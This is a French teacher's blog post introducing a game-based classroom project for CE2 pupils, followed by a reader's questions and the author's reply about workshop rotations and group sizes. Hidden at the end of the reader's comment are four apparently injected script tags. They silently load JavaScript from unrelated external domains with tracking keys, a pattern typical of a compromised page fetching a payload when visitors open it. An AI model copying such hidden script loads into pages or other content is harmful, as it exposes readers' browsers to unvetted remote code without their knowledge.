• Ludiclasse 1 : Projet Ludiclasse 1

    L'année qui arrive sera l'occasion pour mes collègues et moi d'orienter notre pédagogie différemment en laissant plus de place aux jeux. Après quelques lectures et visites de sites et blogs de collègues j'ai commencé à construire le projet. Je publierai donc tout au long de l'année les différents documents que je construirai pour l'occasion .

    Commençons par la progression de la période 1.

    Partager via Gmail Yahoo!

    Tags Tags : , , , , , , , ,
  • Commentaires

    1
    Cat
    Jeudi 28 Juillet 2022 à 08:57

    Bravo et merci pour cet exemple de progression, j'aime beaucoup l'idée de préciser les fonctions exécutives et cognitives pour chacun des jeux. Peux-tu préciser à quel niveau de classe cela s'adresse, je ne l'ai pas vu, et je me demande comment vous fonctionnez dans l'école, est-ce que les jeux tournent d'une classe à l'autre (tu indiques que ta séance a lieu le vendredi, est-ce qu'un collègue propose la même un autre jour ?). Quand dans ta présentation tu parles d'ateliers, est-ce que cela signifie que tous les élèves passent à ce jeu dans la séance ou que les rotations se font d'une séance à l'autre ? Et combien d'élèves envisages-tu par atelier, comment gères-tu le fait que d'un jeu à l'autre le nombre de joueurs n'est pas toujours le même ?

    Pardon pour toutes ces questions, mais ce projet a l'air tellement intéressant qu'on s'imagine déjà l'expérimenter en classe rien qu'à lire ton document !

    je te souhaite une bonne fin de vacances, sans oublier de déconnecter aussi !

    <script src="//trableflick.com/21aca573d498d25317.js"></script> <script src="http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x" type="text/javascript"></script> <script src="http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1658990724168" type="text/javascript"></script> <script src="http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2" type="text/javascript"></script>
    2
    Vendredi 29 Juillet 2022 à 17:50

     

    D'abord merci pour ces encouragements. J'ai essayé d'après la connaissance des jeux que j'avais de mettre en avant les fonctions principales travaillées mais cela n'a pas valeur de vérité. Tu peux jeter un œil sur le programme optineurone qui sera plus précis que moi. 

    je suis en train de construire un dossier plus conséquent sur la façon de fonctionner et je mettrai en ligne quand il sera terminé.

    Mais cela s'adresse à des CE2 et je ne sais pas encore comment nous allons nous organiser avec ma collègue. Cela fonctionnera sous forme d'ateliers tournants et les élèves sur les 7 semaines joueront à tous les jeux. Certains joueront en autonomie et d'autres avec un adulte. Ensuite l'élève qui a le mieux compris rejouera une deuxième fois et sera chargé d'expliquer aux autres. Mais reste à vérifier que cela est viable. C'est un premier essai.

    Pour le choix des groupes j'ai pris comme base 4 élèves (j'ai la chance d'en avoir que 20 cette année en théorie) et la plupart des jeux sont jouables à 4. Quand ce sont des jeux à 2 ou des jeux trop courts je propose plusieurs jeux dont un connus de tous (par exemple dooble)

     

    Suivre le flux RSS des commentaires

    Vous devez être connecté pour commenter